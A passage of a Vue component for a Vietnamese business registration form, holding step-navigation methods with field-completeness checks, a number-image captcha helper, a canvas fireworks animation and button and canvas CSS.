                this.positions = e.response.data.random_numbers
                this.buildGrid()
                this.selected = []
            })
        },
        getImage(num) {
            return require('@/assets/images/captcha/'+num+'.png')
        },
        shuffleArray(arr) {
            return [...arr].sort(() => Math.random() - 0.5)
        },
        capitalizeWords(fieldName) {
            if (!this[fieldName]) return;
            // this[fieldName] = this[fieldName].toLowerCase().replace(/(^\w{1})|(\s+\w{1})/g, letter => letter.toUpperCase());
            this[fieldName] = this[fieldName].split(' ').map(word => {
                if (!word) return '';
                return word.charAt(0).toUpperCase() + word.slice(1).toLowerCase();
            }).join(' ');
        },
        clickStepone () {
            if(this.company != ''){
                this.step = 2
                this.classAc = 'active2'
                this.percent = 67
                this.classPg = 'step_progress_1'
                this.numberstep = 2
            }else{
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: 'Chọn loại hình doanh nghiệp',
                    showConfirmButton: false,
                    timer: 2000
                })
            }
        },
        clickSteptwo () {
            if(this.fullname != '' && this.birthday != '' && this.identity_number != '' && this.taxCode != '' && this.passwordRg != '' && this.confirmPasswordRg != ''){
                this.step = 3
                this.classAc = 'active3'
                this.percent = 100
                this.classPg = 'step_progress_2'
                this.numberstep = 3
            }else{
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: 'Vui lòng nhập đầy đủ dữ liệu',
                    showConfirmButton: false,
                    timer: 2000
                })
            }
        },
        clickbackStepzr () {
            this.check = 1
        },
        clickbackStepone () {
            this.step = 1
            this.classAc = 'active1'
            this.percent = 33
            this.classPg = ''
            this.numberstep = 1
        },
        clickbackSteptwo () {
            this.step = 2
            this.classAc = 'active2'
            this.percent = 67
            this.classPg = 'step_progress_1'
            this.numberstep = 2
        },
        initCanvas() {
            const checkDOMInterval = setInterval(() => {
                this.canvas = document.getElementById('fireworksCanvas');
                if (this.canvas) {
                    clearInterval(checkDOMInterval);
                    this.ctx = this.canvas.getContext('2d');
                    this.resizeCanvas(); 
                    this.loop();
                    setTimeout(() => this.triggerFirework(), 200);
                }
            }, 50);
            setTimeout(() => {
                clearInterval(checkDOMInterval);
            }, 5000);
        },
        resizeCanvas() {
            if (!this.canvas) return; 
            const targetWidth = window.innerWidth > 575 ? 575 : window.innerWidth;
            this.canvas.width = targetWidth;
            this.canvas.height = window.innerHeight;
        },
        triggerFirework() {
            if (!this.canvas) return; 
            const x = Math.random() * this.canvas.width;
            const y = Math.random() * (this.canvas.height / 2); 
            const color = `hsl(${Math.random() * 360}, 100%, 50%)`;
            for (let i = 0; i < 100; i++) {
                this.particles.push(this.createParticle(x, y, color));
            }
        },
        createParticle(x, y, color) {
            const angle = Math.random() * Math.PI * 2;
            const speed = Math.random() * 5 + 2;
            return {
                x, y, color,
                radius: Math.random() * 3 + 1,
                vx: Math.cos(angle) * speed,
                vy: Math.sin(angle) * speed,
                alpha: 1,
                decay: Math.random() * 0.015 + 0.015
            };
        },
        loop() {
            this.animationFrameId = requestAnimationFrame(() => this.loop());
            if (!this.canvas || !this.ctx) return; 
            this.ctx.clearRect(0, 0, this.canvas.width, this.canvas.height);
            for (let i = this.particles.length - 1; i >= 0; i--) {
                const p = this.particles[i];
                p.x += p.vx;
                p.y += p.vy;
                p.vy += 0.05;
                p.alpha -= p.decay;
                if (p.alpha <= 0) {
                    this.particles.splice(i, 1);
                    continue;
                }
                this.ctx.save();
                this.ctx.globalAlpha = p.alpha;
                this.ctx.beginPath();
                this.ctx.arc(p.x, p.y, p.radius, 0, Math.PI * 2);
                this.ctx.fillStyle = p.color;
                this.ctx.fill();
                this.ctx.restore();
            }
        },
        startContinuousFireworks() {
            if (this.fireworkInterval) clearInterval(this.fireworkInterval);
            this.triggerFirework();
            this.fireworkInterval = setInterval(() => {
            this.triggerFirework();
            }, 300); 
        },
        stopFireworks() {
            if (this.fireworkInterval) {
            clearInterval(this.fireworkInterval);
            this.fireworkInterval = null;
            }
        }
    }
}
</script>
<style>
    .btn_modal_login_tool {
        margin-top: 20px;
    }
    .btn_login button {
        width: 100%;
        padding: 14px 24px;
        background: linear-gradient(135deg, #d32f2f 0%, #b71c1c 100%);
        color: #fff;
        border: none;
        border-radius: 50px;
        font-size: 17px;
        font-weight: 700;
        letter-spacing: 0.5px;
        cursor: pointer;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 10px;
        box-shadow: 0 4px 16px rgba(183, 28, 28, 0.45);
        transition: all 0.3s ease;
        position: relative;
        overflow: hidden;
    }
    .btn_login button::after {
        content: '\2192';
        font-size: 20px;
        font-weight: 700;
        position: absolute;
        right: 20px;
        transition: transform 0.3s ease;
    }
    .btn_login button:hover {
        background: linear-gradient(135deg, #e53935 0%, #c62828 100%);
        box-shadow: 0 6px 24px rgba(183, 28, 28, 0.6);
        transform: translateY(-2px);
    }
    .btn_login button:hover::after {
        transform: translateX(4px);
    }
    .btn_login button:active {
        transform: translateY(0);
        box-shadow: 0 2px 8px rgba(183, 28, 28, 0.4);
    }
    .btn_login button:disabled {
        background: linear-gradient(135deg, #9e9e9e 0%, #757575 100%);
        box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2);
        cursor: not-allowed;
    }
    .btn_login button:disabled:hover {
        transform: none;
        box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2);
    }
    .btn_login button:disabled::after {
        content: none;
    }

canvas {
  position: absolute;
  top: 0;
  left: 50%; /* Căn giữa màn hình */
  transform: translateX(-50%); /* Căn giữa màn hình */
  width: 100%;
  height: 100%;
  max-width: 575px; /* GIỚI HẠN CHIỀU RỘNG TỐI ĐA 575PX */
  z-index: 1; /* Để số nhỏ để làm nền phía sau, hoặc 99 để nổi lên trên form */
  pointer-events: none;
}
</style>